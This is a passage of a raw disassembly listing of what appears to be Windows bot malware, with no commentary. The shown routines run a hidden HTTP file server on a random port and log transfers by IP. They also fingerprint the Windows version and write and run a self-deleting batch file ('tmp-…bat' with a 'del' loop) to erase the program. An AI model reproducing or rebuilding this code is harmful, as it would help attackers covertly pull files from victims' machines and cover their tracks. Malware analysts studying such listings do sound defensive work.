loc_4187A6: ; CODE XREF: sub_418552+1C8�j
push edi
push offset dword_4266A8
push offset aSS_4 ; "%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 14h
lea esi, [eax+1]
loc_4187CE: ; CODE XREF: sub_418552+281�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4187CE
loc_4187D5: ; CODE XREF: sub_418552+21B�j
; sub_418552+252�j
sub eax, esi
mov [ebp+eax+0CA8h+var_108], bl
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41884B
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue?_0 ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_41882C: ; CODE XREF: sub_418552+2DF�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41882C
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_41883D: ; CODE XREF: sub_418552+2F0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41883D
jmp loc_41892E
; ---------------------------------------------------------------------------
loc_418849: ; CODE XREF: sub_418552+1B1�j
xor ebx, ebx
loc_41884B: ; CODE XREF: sub_418552+2A1�j
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+0CA8h+var_108]
push eax
call ds:dword_41D06C
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0CA8h+var_D24], esi
jz short loc_4188DF
push ebx
push esi
call ds:dword_41D070
mov edi, eax
push edi
mov [ebp+0CA8h+var_D1C], edi
call sub_4036E0
push edi
push ebx
push eax
mov [ebp+0CA8h+var_D20], eax
call sub_407B70
add esp, 10h
push ebx
push ebx
push ebx
push esi
mov esi, ds:dword_41D074
call esi
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push edi
mov edi, ds:dword_41D078
jmp short loc_4188D1
; ---------------------------------------------------------------------------
loc_4188A9: ; CODE XREF: sub_418552+389�j
cmp [ebp+0CA8h+var_D28], ebx
jnz loc_418933
push [ebp+0CA8h+var_D1C]
push ebx
push [ebp+0CA8h+var_D20]
call sub_407B70
add esp, 0Ch
push ebx
push ebx
push ebx
push [ebp+0CA8h+var_D24]
call esi
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push [ebp+0CA8h+var_D1C]
loc_4188D1: ; CODE XREF: sub_418552+355�j
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+var_D24]
call edi
test eax, eax
jnz short loc_4188A9
jmp short loc_418933
; ---------------------------------------------------------------------------
loc_4188DF: ; CODE XREF: sub_418552+31A�j
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue? ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_418916: ; CODE XREF: sub_418552+3C9�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418916
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_418927: ; CODE XREF: sub_418552+3DA�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418927
loc_41892E: ; CODE XREF: sub_418552+2F2�j
sub eax, esi
mov [ebp+0CA8h+var_D1C], eax
loc_418933: ; CODE XREF: sub_418552+35A�j
; sub_418552+38B�j
push 400h
lea eax, [ebp+0CA8h+var_508]
push ebx
push eax
call sub_407B70
push [ebp+0CA8h+var_D1C]
lea eax, [ebp+0CA8h+var_508]
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
push 3FFh
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 1Ch
lea esi, [eax+1]
loc_41896A: ; CODE XREF: sub_418552+41D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41896A
sub eax, esi
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea esi, [eax+1]
loc_418983: ; CODE XREF: sub_418552+436�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418983
sub eax, esi
mov esi, ds:dword_41D228
push ebx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi
test eax, eax
jz loc_418ABE
push ebx
push [ebp+0CA8h+var_D1C]
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+arg_0]
call esi
test eax, eax
jz loc_418ABE
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz loc_418ABE
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
xor eax, eax
lea edi, [ebp+0CA8h+var_D18]
stosd
stosd
stosd
add esp, 0Ch
stosd
lea eax, [ebp+0CA8h+var_D24]
push eax
lea eax, [ebp+0CA8h+var_D18]
push eax
push [ebp+0CA8h+arg_0]
mov [ebp+0CA8h+var_D24], 10h
call ds:dword_41D248
movzx eax, [ebp+0CA8h+var_D11]
movzx ecx, [ebp+0CA8h+var_D12]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D13]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D14]
shl eax, 8
add eax, ecx
push 2
mov [ebp+0CA8h+var_D1C], eax
push 4
lea eax, [ebp+0CA8h+var_D1C]
push eax
call ds:dword_41D280
test eax, eax
push ds:dword_433940
jnz short loc_418A86
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransferD_ ; "HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 24h
jmp short loc_418AB1
; ---------------------------------------------------------------------------
loc_418A86: ; CODE XREF: sub_418552+507�j
push dword ptr [eax]
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransfer_0 ; "HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 28h
loc_418AB1: ; CODE XREF: sub_418552+532�j
inc ds:dword_433940
push esi
call sub_402B9B
pop ecx
loc_418ABE: ; CODE XREF: sub_418552+453�j
; sub_418552+46A�j ...
push [ebp+0CA8h+var_D20]
call sub_403603
pop ecx
loc_418AC7: ; CODE XREF: sub_418552+189�j
push [ebp+0CA8h+arg_0]
call ds:dword_41D224
loc_418AD3: ; CODE XREF: sub_418552+19A�j
pop edi
loc_418AD4: ; CODE XREF: sub_418552+AB�j
mov ecx, [ebp+0CA8h+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CA8h
leave
retn
sub_418552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AEB proc near ; DATA XREF: sub_418C40+27�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 401h
jz short loc_418AFE
pop ebp
jmp ds:dword_41D200
; ---------------------------------------------------------------------------
loc_418AFE: ; CODE XREF: sub_418AEB+A�j
mov eax, [ebp+arg_C]
dec eax
jz short loc_418B10
sub eax, 7
jnz short loc_418B19
call sub_41835D
jmp short loc_418B19
; ---------------------------------------------------------------------------
loc_418B10: ; CODE XREF: sub_418AEB+17�j
push [ebp+arg_8]
call sub_418552
pop ecx
loc_418B19: ; CODE XREF: sub_418AEB+1C�j
; sub_418AEB+23�j
xor eax, eax
pop ebp
retn 10h
sub_418AEB endp
; =============== S U B R O U T I N E =======================================
sub_418B1F proc near ; CODE XREF: sub_418C40+9B�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, 104h
push edi
xor ebp, ebp
push ebp
mov ebx, offset dword_4266A8
push ebx
call sub_407B70
push edi
push ebp
mov esi, offset dword_4268B8
push esi
call sub_407B70
push edi
push ebp
mov ebp, offset byte_4267B0
push ebp
call sub_407B70
add esp, 24h
push edi
push ebx
call ds:dword_41D0F4
push edi
mov ebx, offset byte_425061
call sub_4196D1
push esi
push offset dword_4266A8
push offset aSS_10 ; "%s\\%s"
push 103h
push ebp
call sub_402AEE
mov eax, ebp
add esp, 18h
lea ecx, [eax+1]
loc_418B85: ; CODE XREF: sub_418B1F+6B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418B85
push 0
push 1
sub eax, ecx
push 2
mov ds:byte_4267B0[eax], dl
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov ds:dword_4267AC, eax
jnz short loc_418BB8
push eax
loc_418BAB: ; CODE XREF: sub_418B1F+E7�j
call ds:dword_41D224
xor eax, eax
jmp loc_418C3B
; ---------------------------------------------------------------------------
loc_418BB8: ; CODE XREF: sub_418B1F+89�j
mov eax, 0FFDCh
mov ebx, 3E8h
call sub_4192C7
push eax
mov ds:dword_426594, eax
mov ds:word_426694, 2
call ds:dword_41D278
and ds:dword_426698, 0
push 10h
push offset word_426694
push ds:dword_4267AC
mov ds:word_426696, ax
call ds:dword_41D26C
test eax, eax
jz short loc_418C08
loc_418C00: ; CODE XREF: sub_418B1F+102�j
; sub_418B1F+114�j
push ds:dword_4267AC
jmp short loc_418BAB
; ---------------------------------------------------------------------------
loc_418C08: ; CODE XREF: sub_418B1F+DF�j
push 9
push 401h
push [esp+18h+arg_0]
push ds:dword_4267AC
call ds:dword_41D22C
test eax, eax
jnz short loc_418C00
push 4
push ds:dword_4267AC
call ds:dword_41D230
test eax, eax
jnz short loc_418C00
inc eax
mov ds:byte_4268B4, al
loc_418C3B: ; CODE XREF: sub_418B1F+94�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418B1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C40 proc near ; DATA XREF: sub_418D17+21�o
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 50h
mov eax, ds:dword_4266A4
push ebx
mov ebx, ds:dword_41D1F4
push esi
push edi
mov edi, 7F00h
push edi
xor esi, esi
push esi
mov [ebp+var_3C], eax
mov [ebp+var_28], offset dword_4255BC
mov [ebp+var_48], offset sub_418AEB
mov [ebp+var_4C], 8
mov [ebp+var_50], 30h
call ebx
push edi
push esi
mov [ebp+var_38], eax
call ebx
push edi
push esi
mov [ebp+var_24], eax
call ds:dword_41D20C
mov [ebp+var_34], eax
lea eax, [ebp+var_50]
push eax
mov [ebp+var_2C], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_30], 1
call ds:dword_41D1F0
test ax, ax
jz short loc_418D0E
push esi
push ds:dword_4266A4
mov eax, 80000000h
push esi
push esi
push esi
push esi
push eax
push eax
push 0CF0000h
push offset asc_420364 ; " "
push offset dword_4255BC
push esi
call ds:dword_41D1FC
push eax
call sub_418B1F
test eax, eax
pop ecx
jz short loc_418D0E
mov edi, ds:dword_41D208
jmp short loc_418D01
; ---------------------------------------------------------------------------
loc_418CED: ; CODE XREF: sub_418C40+CC�j
lea eax, [ebp+var_20]
push eax
call ds:dword_41D1F8
lea eax, [ebp+var_20]
push eax
call ds:dword_41D204
loc_418D01: ; CODE XREF: sub_418C40+AB�j
push esi
push esi
push esi
lea eax, [ebp+var_20]
push eax
call edi
test eax, eax
jnz short loc_418CED
loc_418D0E: ; CODE XREF: sub_418C40+70�j
; sub_418C40+A3�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_418C40 endp
; =============== S U B R O U T I N E =======================================
sub_418D17 proc near ; CODE XREF: sub_401F1C+70�p
; J8@F_7_S:0041BFC8�p
push 4
mov eax, offset loc_41C299
call sub_4045CC
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
and dword ptr [ebp-4], 0
test esi, esi
jz short loc_418D4B
push offset sub_418C40
xor ecx, ecx
mov edi, offset aHs ; "HS"
call sub_4140AB
jmp short loc_418D4D
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: sub_418D17+1F�j
xor eax, eax
loc_418D4D: ; CODE XREF: sub_418D17+32�j
cmp dword ptr [eax+4], 0
setnz al
call sub_40466B
retn
sub_418D17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418D5A proc near ; CODE XREF: sub_4192C7:loc_4192EB�p
mov eax, ds:dword_4265B0
mov edx, ds:dword_4265B4
lea ecx, ds:4265B8h[eax*4]
push esi
mov esi, eax
mov eax, ds:dword_4265B8[edx*4]
add eax, [ecx]
and eax, 3FFFFFFFh
inc esi
cmp esi, 37h
mov [ecx], eax
jnz short loc_418D87
xor esi, esi
loc_418D87: ; CODE XREF: sub_418D5A+29�j
inc edx
cmp edx, 37h
jnz short loc_418D8F
xor edx, edx
loc_418D8F: ; CODE XREF: sub_418D5A+31�j
mov ds:dword_4265B0, esi
mov ds:dword_4265B4, edx
sar eax, 6
pop esi
retn
sub_418D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_401CC0+125�p
; sub_41748B:loc_41759C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058
test eax, eax
jz short loc_418E1C
lea eax, [ebp+var_8]
push eax
call ds:dword_41D064
test eax, eax
jz short loc_418E1C
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_41C070
push 0
push 15180h
push edx
push eax
call sub_411800
push 0
push 0E10h
push ebx
push ecx
mov ds:dword_426598, eax
mov ds:dword_42659C, edx
call sub_411800
push 0
push 3Ch
push ebx
push ecx
mov ds:dword_4265A0, eax
mov ds:dword_4265A4, edx
call sub_41C070
mov ds:dword_4265A8, eax
mov ds:dword_4265AC, edx
loc_418E1C: ; CODE XREF: sub_418DA0+13�j
; sub_418DA0+21�j
pop ebx
leave
retn
sub_418DA0 endp
; =============== S U B R O U T I N E =======================================
sub_418E1F proc near ; CODE XREF: sub_401CC0+EF�p
; sub_41748B+BC�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
push 0
push esi
call sub_407B70
add esp, 0Ch
cmp [esp+arg_4], 0
push [esp+arg_0]
push esi
jz short loc_418E41
push 1002h
jmp short loc_418E43
; ---------------------------------------------------------------------------
loc_418E41: ; CODE XREF: sub_418E1F+19�j
push 7
loc_418E43: ; CODE XREF: sub_418E1F+20�j
push 800h
call ds:dword_41D054
mov eax, esi
retn
sub_418E1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_418E51 proc near ; CODE XREF: sub_401CC0+DA�p
; sub_41748B+8B�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+74h+var_4], eax
push ebx
push edi
lea eax, [ebp+74h+var_98]
push eax
mov ebx, ecx
mov [ebp+74h+var_98], 94h
call ds:dword_41D068
push ebx
xor edi, edi
push edi
push esi
call sub_407B70
add esp, 0Ch
cmp [ebp+74h+var_94], 6
jnz short loc_418E9A
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset aVis ; "VIS"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418E51+3B�j
cmp [ebp+74h+var_94], 5
jnz short loc_418EC6
cmp [ebp+74h+var_90], 2
jnz short loc_418EAD
push offset a2k3 ; "2K3"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EAD: ; CODE XREF: sub_418E51+53�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EBA
push offset aXp_0 ; "XP"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EBA: ; CODE XREF: sub_418E51+60�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset a2k ; "2K"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EC6: ; CODE XREF: sub_418E51+4D�j
cmp [ebp+74h+var_94], 4
jnz short loc_418F05
cmp [ebp+74h+var_90], 5Ah
jnz short loc_418ED9
push offset aMe ; "ME"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418ED9: ; CODE XREF: sub_418E51+7F�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EE6
push offset a98 ; "98"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EE6: ; CODE XREF: sub_418E51+8C�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
cmp [ebp+74h+var_88], 2
jnz short loc_418EF8
push offset aNt ; "NT"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418E51+9E�j
cmp [ebp+74h+var_88], 1
jnz short loc_418F17
push offset a95 ; "95"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418F05: ; CODE XREF: sub_418E51+40�j
; sub_418E51+6C�j ...
push offset aUnk ; "UNK"
loc_418F0A: ; CODE XREF: sub_418E51+47�j
; sub_418E51+5A�j ...
lea eax, [ebx-1]
push eax
push esi
call sub_402AEE
add esp, 0Ch
loc_418F17: ; CODE XREF: sub_418E51+AB�j
mov eax, esi
lea edx, [eax+1]
loc_418F1C: ; CODE XREF: sub_418E51+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418F1C
sub eax, edx
cmp [ebp+74h+arg_0], cl
mov [eax+esi], cl
jz loc_418FB3
push ebx
call sub_402648
mov edi, eax
push edi
call sub_402A45
push eax
push 0
push edi
call sub_407B70
add esp, 14h
push [ebp+74h+var_8C]
lea eax, [ebp+74h+var_84]
push [ebp+74h+var_90]
push [ebp+74h+var_94]
push eax
push esi
push offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 20h
lea ecx, [eax+1]
loc_418F75: ; CODE XREF: sub_418E51+129�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418F75
push ebx
sub eax, ecx
push 0
push esi
mov [eax+edi], dl
call sub_407B70
push edi
push offset aS_5 ; "%s"
dec ebx
push ebx
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_418FA0: ; CODE XREF: sub_418E51+154�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418FA0
sub eax, ecx
push edi
mov [eax+esi], dl
call sub_402B9B
pop ecx
loc_418FB3: ; CODE XREF: sub_418E51+DA�j
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402710
add ebp, 74h
leave
retn
sub_418E51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FC6 proc near ; CODE XREF: sub_401C1D+50�p
; sub_401CC0+FE�p ...
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push edi
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
xor eax, eax
mov edi, esi
stosd
stosd
stosd
stosd
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+var_1C], 10h
call ds:dword_41D238
movzx eax, [ebp+var_11]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push 0Fh
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_419029: ; CODE XREF: sub_418FC6+68�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419029
sub eax, ecx
mov ecx, [ebp+var_8]
mov [eax+esi], dl
xor ecx, ebp
mov eax, esi
pop edi
call sub_402710
leave
retn
sub_418FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419044 proc near ; CODE XREF: sub_401F1C+10C�p
; sub_417676+A5�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov cl, [eax]
test cl, cl
push edi
jz short loc_4190AD
loc_419052: ; CODE XREF: sub_419044+24�j
mov dl, [esi]
cmp dl, 2Ah
jz short loc_41906A
cmp dl, cl
jz short loc_419062
cmp dl, 3Fh
jnz short loc_419088
loc_419062: ; CODE XREF: sub_419044+17�j
inc esi
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_419052
loc_41906A: ; CODE XREF: sub_419044+13�j
mov cl, [eax]
test cl, cl
jz short loc_4190AD
mov edi, [ebp+var_4]
loc_419073: ; CODE XREF: sub_419044+5F�j
mov dl, [esi]
cmp dl, 2Ah
jnz short loc_41908C
inc esi
cmp byte ptr [esi], 0
jz short loc_4190A7
mov [ebp+var_4], esi
lea edi, [eax+1]
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_419088: ; CODE XREF: sub_419044+1C�j
xor eax, eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_41908C: ; CODE XREF: sub_419044+34�j
cmp dl, cl
jz short loc_41909D
cmp dl, 3Fh
jz short loc_41909D
mov esi, [ebp+var_4]
mov eax, edi
inc edi
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41909D: ; CODE XREF: sub_419044+4A�j
; sub_419044+4F�j
inc esi
inc eax
loc_41909F: ; CODE XREF: sub_419044+42�j
; sub_419044+57�j
mov cl, [eax]
test cl, cl
jnz short loc_419073
jmp short loc_4190AD
; ---------------------------------------------------------------------------
loc_4190A7: ; CODE XREF: sub_419044+3A�j
xor eax, eax
inc eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_4190AC: ; CODE XREF: sub_419044+6C�j
inc esi
loc_4190AD: ; CODE XREF: sub_419044+C�j
; sub_419044+2A�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4190AC
xor eax, eax
cmp [esi], al
setz al
loc_4190B9: ; CODE XREF: sub_419044+46�j
; sub_419044+66�j
pop edi
pop esi
leave
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190BD proc near ; CODE XREF: sub_419477+14A�p
var_23C = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
push 37h
lea eax, [ebp+var_3B]
push ebx
push eax
mov [ebp+var_3C], bl
call sub_407B70
mov esi, 0FFh
push esi
lea eax, [ebp+var_23B]
push ebx
push eax
mov [ebp+var_23C], bl
call sub_407B70
push esi
lea eax, [ebp+var_13B]
push ebx
push eax
mov [ebp+var_13C], bl
call sub_407B70
add esp, 24h
push 100h
lea eax, [ebp+var_13C]
push eax
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
lea eax, [ebp+var_13C]
push eax
push eax
lea eax, [ebp+var_23C]
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push eax
call sub_4030B5
push 104h
call sub_402648
mov esi, eax
push esi
call sub_402A45
add esp, 18h
dec eax
push eax
push esi
call ds:dword_41D0F4
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+var_3C]
push edx
push esi
push offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
push eax
call sub_4030B5
push esi
call sub_402B9B
lea eax, [ebp+var_3C]
push offset aW ; "w"
push eax
call sub_4031F4
mov esi, eax
add esp, 30h
cmp esi, ebx
jz short loc_41920B
lea eax, [ebp+var_23C]
push eax
push offset aS_6 ; "%s"
push esi
call sub_403207
push esi
call sub_4034C4
add esp, 10h
push ebx
push ebx
push ebx
lea eax, [ebp+var_3C]
push eax
push ebx
push ebx
call ds:dword_41D1E4
loc_41920B: ; CODE XREF: sub_4190BD+122�j
mov ecx, [ebp+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4190BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419219 proc near ; CODE XREF: J8@F_7_S:0041BABE�p
; J8@F_7_S:0041BDC4�p
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
push edi
xor ebx, ebx
push 40h
lea eax, [ebp+var_168]
push ebx
push eax
mov [ebp+var_16C], ebx
call sub_407B70
xor eax, eax
mov [ebp+var_124], ebx
lea edi, [ebp+var_120]
stosd
stosd
mov esi, 103h
push esi
stosd
lea eax, [ebp+var_113]
push ebx
push eax
mov [ebp+var_114], bl
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_114]
push esi
push eax
call sub_403436
add esp, 28h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_16C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
push ebx
lea eax, [ebp+var_114]
push eax
push ebx
call ds:dword_41D05C
mov ecx, [ebp+var_8]
test eax, eax
pop edi
setnz al
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_419219 endp
; ---------------------------------------------------------------------------
push 0
call sub_403540
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4192C7 proc near ; CODE XREF: J8@F_7_S:00413AAE�p
; J8@F_7_S:00413AC1�p ...
push esi
mov esi, eax
xor eax, eax
inc eax
sub eax, ebx
add esi, eax
cmp esi, 1
jg short loc_4192DA
mov eax, ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4192DA: ; CODE XREF: sub_4192C7+D�j
push 2
pop eax
cmp esi, eax
jle short loc_4192E7
loc_4192E1: ; CODE XREF: sub_4192C7+1E�j
add eax, eax
cmp eax, esi
jl short loc_4192E1
loc_4192E7: ; CODE XREF: sub_4192C7+18�j
push edi
lea edi, [eax-1]
loc_4192EB: ; CODE XREF: sub_4192C7+2D�j
call sub_418D5A
and eax, edi
cmp eax, esi
jge short loc_4192EB
pop edi
add eax, ebx
pop esi
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
sub_4192FB proc near ; CODE XREF: sub_401F1C+420�p
; J8@F_7_S:loc_413F5D�p ...
and ds:dword_4265B0, 0
push 0
mov ds:dword_4265B4, 1Fh
call sub_403540
mov edx, 3FFFFFFFh
and eax, edx
pop ecx
mov ds:dword_4265B8, eax
mov ds:dword_4265BC, 1
mov eax, offset dword_4265B8
push esi
loc_419330: ; CODE XREF: sub_4192FB+48�j
lea ecx, [eax+4]
mov esi, [ecx]
add esi, [eax]
and esi, edx
mov [eax+8], esi
mov eax, ecx
cmp eax, offset dword_42668C
jl short loc_419330
pop esi
retn
sub_4192FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419347 proc near ; CODE XREF: sub_41748B+E6�p
; sub_41A5C1+B6�p ...
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push ds:dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
